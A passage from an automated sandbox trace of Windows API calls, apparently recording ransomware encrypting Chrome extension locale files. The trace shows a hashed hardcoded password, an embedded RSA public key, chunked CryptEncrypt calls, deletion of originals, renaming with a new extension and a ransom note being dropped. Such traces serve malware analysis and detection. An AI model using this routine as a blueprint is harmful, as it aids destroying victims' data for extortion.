lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.024] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.024] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.024] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.024] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.024] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.024] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.024] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.024] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.025] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.025] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.025] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.025] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.025] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.025] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.025] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.025] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.025] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.025] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.025] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.025] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.025] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.025] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.025] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.025] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.025] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.025] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.026] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.026] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.026] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.026] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.026] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.026] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.026] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.026] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.026] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.026] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x77, lpOverlapped=0x0) returned 1 [0263.026] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x77, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x80) returned 1 [0263.026] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.026] CloseHandle (hObject=0x5d5c) returned 1 [0263.026] CloseHandle (hObject=0x5d60) returned 1 [0263.026] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), bFailIfExists=0) returned 1 [0263.029] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json", dwFileAttributes=0x0) returned 1 [0263.030] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.gsg")) returned 1 [0263.032] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.fuck")) returned 1 [0263.033] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.033] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0263.033] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.033] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.033] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.033] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\readme_back_files.htm")) returned 0xffffffff [0263.033] AreFileApisANSI () returned 1 [0263.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.034] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.034] GetFileType (hFile=0x5d64) returned 0x1 [0263.034] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.035] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.035] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.036] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.036] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.036] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.036] GetLastError () returned 0x0 [0263.036] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json")) returned 0x20 [0263.036] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json", dwFileAttributes=0x80) returned 1 [0263.036] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.037] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.038] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.038] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.040] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.040] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.040] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.040] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.040] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.040] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.040] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e74808) returned 1 [0263.040] CryptImportPublicKeyInfo (in: hCryptProv=0x2e74808, dwCertEncodingType=0x1, pInfo=0x2ead0e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ead110*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ead118*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e140) returned 1 [0263.040] CryptEncrypt (in: hKey=0x2e7e140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.040] CryptEncrypt (in: hKey=0x2e7e140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e74120*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e74120*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.040] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e74120*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e74120*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.041] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.043] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.044] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.057] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.057] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.057] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.057] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.057] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.057] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.057] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.057] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.057] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.058] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.058] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.058] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.058] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.058] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.058] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.058] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.058] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.058] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.058] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, 